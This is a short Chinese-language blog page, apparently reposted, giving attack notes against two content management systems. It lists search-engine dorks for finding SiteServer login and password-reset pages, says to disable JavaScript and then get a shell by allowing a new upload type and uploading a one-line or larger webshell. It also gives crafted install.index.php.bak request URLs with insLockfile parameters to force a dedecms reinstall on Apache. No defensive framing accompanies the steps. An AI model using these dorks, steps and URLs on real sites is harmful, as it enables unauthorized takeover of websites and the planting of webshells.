0Day 密碼重置dede阿帕奇強制安裝

時間  2019-12-12
標籤 0day day 密碼 重置 dede 強制 安裝 简体版
原文   原文鏈接 

CMS:siteserver
關鍵詞:
inurl:siteserver/login.aspx
inurl:siteserver/forgetPassword.aspx
操做:F12 禁用JS
getshell:添加上傳文件格式,上次一句話或者大馬
=====================================


dedecms 阿帕奇 安裝漏洞
環境:阿帕奇
抓包改url:
install.index.php.bak?insLockfile=moonsec.txt
install.index.php.bak?step=2&insLockfile=moonsec.txt
install.index.php.bak?step=3&insLockfile=moonsec.txt(這一步取消模塊)
install.index.php.bak?insLockfile=moonsec.txtphp

 

 

 

 

 

 

 

 

 

 

 

 

<!--
              1                _.._        ,------------.
                           ,'      `.    ( We want you! )
                          /  __) __` \    `-,----------'
                         (  (`-`(-')  ) _.-'
                         /)  \  = /  (
                        /'    |--' .  \
                       (  ,---|  `-.)__`
                        )(  `-.,--'   _`-.
                       '/,'          (  Uu",
                        (_       ,    `/,-' )
                        `.__,  : `-'/  /`--'
                          |     `--'  |
                          `   `-._   /
                           \        (
                           /\ .      \.  
                          / |` \     ,-\
                         /  \| .)   /   \
                        ( ,'|\    ,'     :
                        | \,`.`--"/      }
                        `,'    \  |,'    /
                       / "-._   `-/      |
                       "-.   "-.,'|     ;
                      /        _/["---'""]
                     :        /  |"-     '
                     '           |      /
                                 `      |
-->
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程